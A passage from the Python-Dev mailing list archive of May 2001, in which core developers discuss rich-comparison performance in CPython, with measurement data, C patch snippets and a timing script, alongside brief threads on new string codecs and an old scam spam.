Python would guarantee? I'm surprised that > x==x would always be true, but x!=x might be true also. In a type where > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > I had expected that you'd reduced it to > > if (v == w && op == Py_EQ) /* then return Py_True */ > if (v == w && op == Py_NE) /* then return Py_False */ I agree that would be more analogous to what PyObject_Compare() does. I'm not sure either make sense for rich comparisons; for example, under IEEE-754 rules, a NaN must compare not-equal to everything, including itself(!), and richcmps are the only hope Python users have of modeling that. Doing those pointer checks before giving richcmps a chance would kill that hope. Can we agree to drop this one until somebody produces stats saying it's important? I have no reason to suspect that it is. > The one application where this may help is list_contains, in > particular when searching a list of interned strings. string_compare() could special-case pointer equality too, although I suspect doing so would be a net loss. > Please have a look at the patch below. I will, but not tonight anymore -- it's been a very long day. > ... > I agree "in principle" :-) However, you cannot move the case "equal > types, implementing tp_compare" before the case "one of them > implements tp_richcompare" without changing the semantics. Of course. But except for instance objects, answering "does the type implement tp_richcompare?" is one lousy pointer check, and the answer will usually be-- provided we don't start stuffing code into *every* object's tp_richcompare slot! --"no, so I can go to tp_compare immediately". Coercions and richcmps are the oddball cases today. > The change here is what you'd do when you have both richcmp and > oldcomp; Python clearly mandates using richcmp. Yes, except you don't usually have both today and reality is exploitable . > In case this is not obvious (it wasn't to me): UserList will complain > about using the deprecated __cmp__, Sounds like a bug to me; if cmp is deprecated, that's also news to me. > and dictionaries will iterate over their elements differently. dicts didn't have a tp_richcompare slot before I added it last week, and because dicts can do a much faster and more-general job on Py_EQ and Py_NE than dict cmp (but on nothing else). I originally took away the tp_compare slot for dicts and lived to regret it -- it has both now. > Given that richcomp has to be tried first, this patch does the "common > case" at the earliest possible time, and with no overhead, except for > PyErr_Occurred call. The earliest *reasonable* time would be after a short block of new pointer checks while still inside PyObject_RichCompare(): I believe the usual case today is that the objects are of the same type, the type doesn't have a tp_richcompare slot, but does have a tp_compare slot. This covers at least ints, floats, longs and strings, where the overhead of a single function call is most often larger than the time it actually takes to compare the darned things. It's not important to, e.g., get to a dict comparison quickly, because comparing dicts is darned expensive even after we find the dict comparison routine. Ditto comparing instances or matrices etc. Optimizing for richcmps is optimizing the less important thing. BTW, tuples have a richcompare slot today and it's unclear that's a good idea. They do the same kind of Py_EQ/Py_NE "length check" you like for strings, and I'd be surprised if that didn't cost more than it saves. Unlike strings, whenever I compare tuples they *always* have the same size (e.g., think of all the decorator pattern ways tuples are used to augment sorts). OK, across a full run of the test suite, tuplerichcompare() was called about 162000 times, all but about 50 times with Py_EQ or Py_NE. The number of times this code block at the start bore fruit: if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) { /* Shortcut: if the lengths differ, the tuples differ */ PyObject *res; if (op == Py_EQ) res = Py_False; else res = Py_True; Py_INCREF(res); return res; } was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code just burned cycles. I want to move toward optimizations that save more than they cost <0.7 wink>. > ... > For strings, I would still special-case tp_richcompare: when tracing > calls to string_richcompare, I found that most calls with Py_EQ can > be decided by checking that the string lengths are not equal. I expect you'd also find that the current string_compare() usually decides they're not equal on the first character comparison (which *it* special-cases). So special-casing on length isn't a clear win over what's already done. But, if it is, bravo! Special-case the snot out of it without calling *any* string functions (merely calling string_richcompare likely costs a good deal more than comparing the lengths). more-measuring-less-guessing-ly y'rs - tim From thomas@xs4all.net Tue May 15 12:51:06 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 15 May 2001 13:51:06 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600 References: <200105150426.f4F4QVx01531@localhost.local> Message-ID: <20010515135106.A16811@xs4all.nl> On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote: > I thought I was th only one getting all these silly Nigerian scam spams. I > figured maybe they saw my name and decided to test on me (though they might > more cleverly have figured that a fellow Nigerian would be wise to the game). Actually, one of my colleagues informed me that this spam is in fact *very old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the Nigerian spam a mere week after getting the spam myself :) Scott (my colleague, not Adams) remembers first getting it by fax, 15 years ago, and again several years later. And not just one fax, but every single fax in the company, and lots more outside of the company. Apparently the telephone operator issued a warning to all customers not to respond to the fax. Still-sound-advice-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Tue May 15 13:10:16 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 14:10:16 +0200 Subject: [Python-Dev] Easy codec access Message-ID: <3B011CA8.9DDB4FC7@lemburg.com> I've just checked in a set of patches which implement the new .decode() method along with a couple of useful codecs. You can now do things like these: >>> "abc".encode('zlib').encode('base64') 'eJxLTEoGAAJNASc=\n' >>> _.decode('base64').decode('zlib') 'abc' >>> "abcäöü".decode('latin-1') u'abc\xe4\xf6\xfc' >>> "abcäöü".decode('latin-1').encode('latin-1') 'abc\xe4\xf6\xfc' >>> "Hello World !".encode('rot13') 'Uryyb Jbeyq !' So the overall codec experience should be a much better one now. To see just how easy it is to write codecs, please have a look at the string codecs I added in this patch (e.g. zlib_codec.py or hex_codec.py). I am pretty sure that there are a lot more useful things in the standard lib which could benefit from these easy-to-use interfaces. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@pythonware.com Tue May 15 13:11:26 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Tue, 15 May 2001 14:11:26 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 References: <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl> Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff> thomas wrote: > Actually, one of my colleagues informed me that this spam is in fact > *very old* more info here: http://home.rica.net/alphae/419coal/index.htm "A Five Billion US$ (as of 1996, much more now) worldwide Scam which has run since the early 1980's under Successive Governments of Nigeria. "The Nigerian Scam is, according to published reports, the Third to Fifth largest industry in Nigeria." Cheers /F (highest offer this far: $155,000,000) From guido@digicool.com Tue May 15 16:27:31 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 10:27:31 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400." References: Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> > [Martin v. Loewis] > > Is this really exactly what Python would guarantee? I'm surprised that > > x==x would always be true, but x!=x might be true also. In a type where > > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > > I had expected that you'd reduced it to > > > > if (v == w && op == Py_EQ) /* then return Py_True */ > > if (v == w && op == Py_NE) /* then return Py_False */ [Tim] > I agree that would be more analogous to what PyObject_Compare() does. > > I'm not sure either make sense for rich comparisons; for example, under > IEEE-754 rules, a NaN must compare not-equal to everything, including > itself(!), and richcmps are the only hope Python users have of modeling that. > Doing those pointer checks before giving richcmps a chance would kill that > hope. Can we agree to drop this one until somebody produces stats saying > it's important? I have no reason to suspect that it is. PEP 207 is quite explicit that == and != are not to be assumed each other's complement. It is silent on the x==x issue but the PEP mentions IEEE 754 so I agree that this also shouldn't be cut short. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake@acm.org Tue May 15 16:29:10 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 15 May 2001 11:29:10 -0400 (EDT) Subject: [Python-Dev] Unicode docs In-Reply-To: References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com> Tim Peters writes: > The latter addresses several *fundamental* questions untouched by > the former, like whar are the datatypes of the arguments and the > result, what values does errors accept, and what do they mean? The > first blurb answers some more, like what's the default encoding, > and which exception is raised? Neither is complete on its own, but > the reference manual should have a complete answer to all such > questions. It doesn't have to go on at great length. I've beefed up the desciption of the unicode() function by merging the information from AMK's document. > A round-trip example would be invaluable. > > If Fred wanted to incorporate a brief overview too, a light rework of > Andrew/Moshe's writeup would be an excellent start. I'd love to have a contribution from someone with more knowledge of what's there than me. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido@digicool.com Tue May 15 17:35:09 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 11:35:09 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200." <3B011CA8.9DDB4FC7@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com> > I've just checked in a set of patches which implement the new > .decode() method along with a couple of useful codecs. Cool! > To see just how easy it is to write codecs, please have > a look at the string codecs I added in this patch (e.g. > zlib_codec.py or hex_codec.py). I am pretty sure that there > are a lot more useful things in the standard lib which could > benefit from these easy-to-use interfaces. As an excercise, I added a quoted-printable codec. It was easy indeed! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@effbot.org Tue May 15 19:21:00 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Tue, 15 May 2001 20:21:00 +0200 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid> in case anyone has two hours to spare, and the right software, MIT's dynamic languages group has posted a quicktime video of their recent panel on language design. http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html (what 1/2 should result in, why it's good to have both CPython and JPython, why whitespace is significant, why language design is perhaps more related to architecture than math, and lots of other goodies from Guy Steele and others) Cheers /F From nas@python.ca Tue May 15 19:51:20 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 15 May 2001 11:51:20 -0700 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200 References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> Message-ID: <20010515115120.A14357@glacier.fnational.com> Fredrik Lundh wrote: > in case anyone has two hours to spare, and the right software, > MIT's dynamic languages group has posted a quicktime video of > their recent panel on language design. > > http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html Does the streaming actually work for anyone? I've given up and started download the whole .mov files. Neil From martin@loewis.home.cs.tu-berlin.de Tue May 15 20:45:59 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 21:45:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> > more-measuring-less-guessing-ly y'rs - tim Producing numbers is easy :-) I've instrumented my version where string implements richcmp, and special-cases everything I can think of. Counting is done for running the test suite. With this, I get Calls to string_richcompare: 2378660 Calls with different types: 33992 (ie. one is not a string) Calls with identical strings: 120517 Calls where lens decide !EQ: 1775716 ---------------------------- Calls richcmp -> oldcomp: 448435 Total calls to oldcomp: 1225643 Calls oldcomp -> memcmp: 860174 So 5% of the calls are with identical strings, for which I can immediately decide the outcome. 75% can be decided in terms of the string lengths, which leaves ca. 19% for cases where lexicographical comparison is needed. In those cases, the first byte decides in 30%. If I remove the test for "len decides !EQ", I get #riches: 2358322 #riches_ni: 34108 #idents_decide: 102050 #lens_decide: 0 -------------------------------------- rest(computed): 2222164 #comps: 2949421 #memcmps: 917776 So still, ca. 30% can be decided by first byte. It still appears that the total number of calls to memcmp is higher when the length is not taken into consideration. To verify this claim, I've counted the cases where the length decides the outcome, but looking at the first byte also had: lens_decide: 1784897 lens_decide_firstbyte_wouldhave:1671148 So in 6% of the cases, checking the length alone gives a decision which looking at the first byte doesn't; plus it saves a function call. To support the thesis that Py_EQ is the common case for strings, I counted the various operations: pyEQ:2271593 pyLE:9234 pyGE:0 pyNE:20470 pyLT:22765 pyGT:578 Now, that might be flawed since comparing strings for equal is extremely frequent in the testsuite. To give more credibility to the data, I also ran setup.py with my instrumented ./python: riches:21640 riches_ni:76 riches_ni1:0 idents:2885 idents_decide:2885 lens_decide:9472 lens_decide_firstbyte_wouldhave:6223 comps:26360 memcmps:19224 pyEQ:20093 pyLE:46 pyGE:1 pyNE:548 pyLT:876 pyGT:0 That shows that optimizing for Py_NE is not worth it. With these data, I'll upload a patch to SF. Regards, Martin From tim@digicool.com Tue May 15 21:22:37 2001 From: tim@digicool.com (Tim Peters) Date: Tue, 15 May 2001 16:22:37 -0400 Subject: [Python-Dev] Comparison corner case Message-ID: Here from the tail end of a patch comment. If you believe the illustrated behavior is wrong, then I don't believe we gain anything from using the tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain for the latter is that it allows EQ/NE tuple comparison to work correctly on tuples containing elements that support only EQ/NE comparisons): """ BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, because it won't believe there's any difference unless Py_EQ returns false for some corresponding elements: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> C() < C() 1 >>> (C(),) < (C(),) 0 >>> That doesn't make sense -- provided you believe the defn. of C makes sense. """ From guido@digicool.com Tue May 15 22:36:57 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 16:36:57 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST." References: Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Tim wrote: > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ returns false > for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C makes sense. I think in this example the problem is with C, not with the tuple algorithm. The question is, what are you going to do otherwise? You could test for < first, == second -- but that means twice as many comparisons, and for reasonably-behaved items it makes no difference at all. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin@loewis.home.cs.tu-berlin.de Tue May 15 21:59:56 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 22:59:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> > Of course. But except for instance objects, answering "does the type > implement tp_richcompare?" is one lousy pointer check Almost - you also have to check the type flag. > and the answer will usually be-- provided we don't start stuffing > code into *every* object's tp_richcompare slot! --"no, so I can go > to tp_compare immediately". Coercions and richcmps are the oddball > cases today. I'd like to add another data point, answering the question what types are most frequently compared. The first set of data is for running the Python testsuite. riches 3040952 # Calls to PyType_RichCompare eqs 2828345 # Calls where the types are equal String 2323122 Float 141507 Int 125187 Type 99477 Tuple 84503 Long 30325 Unicode 10782 Instance 9335 List 2997 None 383 Class 318 Complex 219 Dict 57 Array 49 WeakRef 34 Function 11 File 11 SRE_Pattern 10 CFunction 9 Lock 8 Module 1 So strings cover 82% of all the compare calls of equally-typed objects, followed by floats with 5%. Those calls together cover 93% of the richcompare calls. Since this might give a blurred view of what is actually used in applications, I ran the PyXML testsuite with that python binary also. Leaving out types that are not used, I get riches 88465 eqs 59279 String 48097 Int 5681 Type 3170 Tuple 760 List 492 Float 332 Instance 269 Unicode 243 None 225 SRE_Pattern 4 Long 3 Complex 3 The first observation here is that "only" 67% of the calls are with equally-typed objects. Of those, 80% are with strings, 9% with integers. The last example is idle, where I just did an "import httplib", for fun. riches 50923 eqs 49882 String 31198 Tuple 8312 Type 7978 Int 1456 None 600 SRE_Pattern 210 List 122 Instance 4 Float 1 Instance method 1 Roughly the same picture: 97% calls with equally-typed objects, of those 62% strings, 3% integers. Notice the 15% for tuples and types, each. So to speed-up the common case clearly means to speed-up string comparisons. If I'd need to optimize anything else afterwards, I'd look into type objects - most likely, they are compared for EQ, which can be done nicely and directly in a tp_richcompare also. Those two optimizations together would give a richcompare to 95% of the objects in the IDLE case. Regards, Martin From guido@digicool.com Tue May 15 23:41:12 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 17:41:12 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200." <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> I'm curious where the frequent comparisons of types come from. Is there lots of code that does frequent assert type(x) == T typechecking? Does isinstance(x, T) perhaps use EQ? --Guido van Rossum (home page: http://www.python.org/~guido/) From barry@digicool.com Tue May 15 22:51:00 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 17:51:00 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.42180.401918.223487@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> I'm curious where the frequent comparisons of types come GvR> from. GvR> Is there lots of code that does frequent GvR> assert type(x) == T GvR> typechecking? GvR> Does isinstance(x, T) perhaps use EQ? Not to mention the several hundred comparisons to None. From jeremy@digicool.com Tue May 15 18:26:54 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:26:54 -0400 (EDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.26334.610144.846269@slothrop.digicool.com> I only learned recently that isinstance() can be called with types instead of classes. I suppose the name lead me in the wrong direction. I had the silly idea that it only applied to instances <0.1 wink>. So it comes as little surprise to me that there is a lot of code executed in, e.g., the test suite that does comparisons on types. In the Lib directory, there are 63 files that use == and the builtin type function. (Simple grep.) A total of 139 instances of this idiom. A cursory scan suggests that most of the call are things like type(obj) == type(''). In the Zope source tree, there are 58 files and 98 individual occurrences. It again looks like comparisons against string type is the most common. I can think of two common cases where an object is checked against the string type. One is an interface that takes a file-like object or its path. The other is an interface that takes a sequence, but doesn't want to try a string as a sequence. Sounds like we ought to do a search-and-destroy on type comparisons, replacing with isinstance() where possible. Jeremy From jeremy@digicool.com Tue May 15 18:41:58 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:41:58 -0400 (EDT) Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <20010515115120.A14357@glacier.fnational.com> References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> <20010515115120.A14357@glacier.fnational.com> Message-ID: <15105.27238.582785.851371@slothrop.digicool.com> I download one of the files, but the quicktime player I have on my Windows box said it didn't understand the file format. I eventually got the streaming version at the 100kbps to "work" where work meant mostly an audio feed and occasional stills that were recognizable. Jeremy PS It was cool to watch the one on compilation. Mat Hostetter, one of the panelists, is my old roommate! From barry@digicool.com Tue May 15 23:56:10 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 18:56:10 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <15105.46090.203278.397835@anthem.wooz.org> >>>>> "JH" == Jeremy Hylton writes: JH> I only learned recently that isinstance() can be called with JH> types instead of classes. I suppose the name lead me in the JH> wrong direction. I had the silly idea that it only applied to JH> instances <0.1 wink>. JH> So it comes as little surprise to me that there is a lot of JH> code executed in, e.g., the test suite that does comparisons JH> on types. JH> In the Lib directory, there are 63 files that use == and the JH> builtin type function. (Simple grep.) A total of 139 JH> instances of this idiom. A cursory scan suggests that most of JH> the call are things like type(obj) == type(''). Even without the forward-looking insight that types are classes , I think type comparisions should have been done with `is' and not ==. So old school type comparisons should have been done as type(obj) is StringType whereas new school type comparisons should be done as isinstance(obj, StringType) With Python 2.1 == is naturally, slower than `is', but isinstance() comes in somewhere in the middle. 563897.802881 is comparisons per second 506827.201066 == comparisons per second 520696.916088 isinstance() comparisons per second -Barry -------------------- snip snip -------------------- from types import StringType import time r = range(1000000) def one(r=r): x = 'hello' t0 = time.time() for i in r: type(x) is StringType t1 = time.time() - t0 print len(r) / t1, 'is comparisons per second' def two(r=r): x = 'hello' t0 = time.time() for i in r: type(x) == StringType t1 = time.time() - t0 print len(r) / t1, '== comparisons per second' def three(r=r): x = 'hello' t0 = time.time() for i in r: isinstance(x, StringType) t1 = time.time() - t0 print len(r) / t1, 'isinstance() comparisons per second' one() two() three() From tim.one@home.com Wed May 16 00:49:03 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 19:49:03 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: Making the 5am email concrete, this is what I meant: Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -c -r2.131 object.c *** object.c 2001/05/11 03:36:45 2.131 --- object.c 2001/05/15 23:39:24 *************** *** 835,841 **** } } else { ! res = do_richcmp(v, w, op); } compare_nesting--; return res; --- 835,863 ---- } } else { ! cmpfunc f; ! if (v->ob_type == w->ob_type ! && RICHCOMPARE(v->ob_type) == NULL ! && (f = v->ob_type->tp_compare) != NULL) ! { ! int c = (*f)(v, w); ! if (c < 0 && PyErr_Occurred()) ! res = NULL; ! else { ! switch (op) { ! case Py_LT: c = c < 0; break; ! case Py_LE: c = c <= 0; break; ! case Py_EQ: c = c == 0; break; ! case Py_NE: c = c != 0; break; ! case Py_GT: c = c > 0; break; ! case Py_GE: c = c >= 0; break; ! } ! res = c ? Py_True : Py_False; ! Py_INCREF(res); ! } ! } ! else ! res = do_richcmp(v, w, op); } compare_nesting--; return res; That's a local change to PyObject_RichCompare, taking a fast path for most scalar types (which don't have richcmps but do have tp_compare today). On my Win98 box reproducible timings are impossible, but it obviously chops out layers and layers of function calls and redundant tests when it triggers. That appears to be more often than not across all apps I've tried, from 60% of PyObject_RichCompare calls to nearly 100%. From tim.one@home.com Wed May 16 01:01:05 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 20:01:05 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ > returns false for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C > makes sense. [Guido] > I think in this example the problem is with C, not with the tuple > algorithm. I can live with that. > The question is, what are you going to do otherwise? You > could test for < first, == second -- but that means twice as many > comparisons, and for reasonably-behaved items it makes no difference > at all. The question remaining is how much of this list/tuple richcmp behavior is guaranteed by the language and how much is just implementation-dependent fuzz. For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple richcmp early-exit test because I never found code that made it trigger. (but tons of code that gets there without triggering). But this has semantic implications too: an implementation without the early exit may call user-defined comparison routines that raise exceptions when comparing tuples of different lengths now. Do you care? (I don't.) From tim.one@home.com Wed May 16 01:37:56 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 20:37:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I'd like to add another data point, answering the question what types > are most frequently compared. That varies wildly by app. I have apps where int compares *overwhelmingly* dominate, others where float compares do, many where strings compares do, and the last code I wrote for Zope spends most of its (very substantial) time doing lookups of "object ids" in dicts. In Python terms, those are Pythong lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and that's another case where ceval.c's special-casing of int compares is impotent. Heck, sort a large homogeneous array once, and whatever element type that array has will likely dominate comparisons for the whole app! That's why I'm so keen to chop out a half dozen layers of blubber for *all* types that don't play the richcmp game (which today includes every type I mentioned above). > The first set of data is for running the Python testsuite. > > riches 3040952 # Calls to PyType_RichCompare > eqs 2828345 # Calls where the types are equal > > String 2323122 > Float 141507 > Int 125187 > Type 99477 > Tuple 84503 > Long 30325 > Unicode 10782 > Instance 9335 > List 2997 > None 383 > Class 318 > Complex 219 > Dict 57 > Array 49 > WeakRef 34 > Function 11 > File 11 > SRE_Pattern 10 > CFunction 9 > Lock 8 > Module 1 > > So strings cover 82% of all the compare calls of equally-typed > objects, followed by floats with 5%. Those calls together cover 93% of > the richcompare calls. > > Since this might give a blurred view of what is actually used in > applications, Note that the top 4 types don't have a tp_richcompare slot today. The tuples are likely composed of simple scalar types, and the latter benefit too. But as above, we can't say anything in advance about the *specific* types a given app is going to compare most often. There is no "typical app" in that respect. > I ran the PyXML testsuite with that python binary > also. Leaving out types that are not used, I get > > riches 88465 > eqs 59279 > > String 48097 > Int 5681 > Type 3170 > Tuple 760 > List 492 > Float 332 > Instance 269 > Unicode 243 > None 225 > SRE_Pattern 4 > Long 3 > Complex 3 > > The first observation here is that "only" 67% of the calls are with > equally-typed objects. Someone who cares about the speed of PyXML would be well advised to figure out why <0.9 wink>: there's no scheme on the horizon that will speed mixed-type comparisons one whit. > Of those, 80% are with strings, 9% with integers. XML is a string-crunching app, right? > The last example is idle, where I just did an "import httplib", for > fun. > > riches 50923 > eqs 49882 > > String 31198 > Tuple 8312 > Type 7978 > Int 1456 > None 600 > SRE_Pattern 210 > List 122 > Instance 4 > Float 1 > Instance method 1 > > Roughly the same picture: 97% calls with equally-typed objects, of > those 62% strings, 3% integers. Notice the 15% for tuples and types, > each. Surprising! > So to speed-up the common case clearly means to speed-up string > comparisons. The only thing the apps I've tried have in common is that the types compared most often do have tp_compare but not tp_richcompare functions. The test suite, XML and IDLE are all heavy string-slingers. > If I'd need to optimize anything else afterwards, I'd look into type > objects - most likely, they are compared for EQ, which can be done > nicely and directly in a tp_richcompare also. Would do just as well to give them a one-liner tp_compare function (in conjunction with the posted patch). > Those two optimizations together would give a richcompare to 95% of > the objects in the IDLE case. Since that's the exact opposite of what I want to do, it's at least interesting . Whatever, there needs to be a (very) fast path, and it needs to pick on something that all common types implement, including at least strings, ints, longs, floats and-- I guess --type objects. I don't know about other people, but I have lots of code that uses the cmp() function heavily. That path has also gotten bloated, and tries each of Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes". It does this now even if the tp_compare slot is defined. The only thing that's saving cmp()-slinging code from major sloth now is that the basic types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out early (before doing the three-way Py_EQ etc dance). But give the basic scalar types richcmp functions, and cmp() will slow down a lot (unless more hacks are added to stop that). From greg@cosc.canterbury.ac.nz Wed May 16 02:58:05 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 16 May 2001 13:58:05 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Tim Peters : > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ What Pythonistas wear on their feet? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From esr@thyrsus.com Wed May 16 03:27:38 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Tue, 15 May 2001 22:27:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200 References: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Message-ID: <20010515222738.A9996@thyrsus.com> Greg Ewing : > Tim Peters : > > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > What Pythonistas wear on their feet? No, man. It's what sexy lady Pythonistas wear on the beach in Rio. (Yes, I know some sexy lady Pythonistas. No, you can't have their phone numbers. Pthfthfthpht...) -- Eric S. Raymond Question with boldness even the existence of a God; because, if there be one, he must more approve the homage of reason, than that of blindfolded fear.... Do not be frightened from this inquiry from any fear of its consequences. If it ends in the belief that there is no God, you will find incitements to virtue in the comfort and pleasantness you feel in its exercise... -- Thomas Jefferson, in a 1787 letter to his nephew From tim.one@home.com Wed May 16 08:14:25 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 03:14:25 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3B00E98E.1C44FF5@lemburg.com> Message-ID: [MAL] > Round-tripping is obviously very important if you use Unicode > as basis for working on text. Since I use 7-bit ASCII exclusively, I've been using encode = decode = lambda x: x I haven't proved that's round-trippable, but haven't bumped into an exception yet. > I don't know about the reasoning behind making cp875 fail the > round-trip -- Unicode certainly provides means to make mappings > round-trip safe (e.g. by reverting to the private Unicode > char. point areas). Then I ignorantly but confidently (indeed, with the cheery confidence only the truly ignorant can truly enjoy!) vote for your approach that maps the non-round-trippable cp875 code points to None. Better safe than sorry, by default. Else 6 of the 7 ambiguous chars will be silent surprises by default. From tim.one@home.com Wed May 16 08:25:28 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 03:25:28 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: 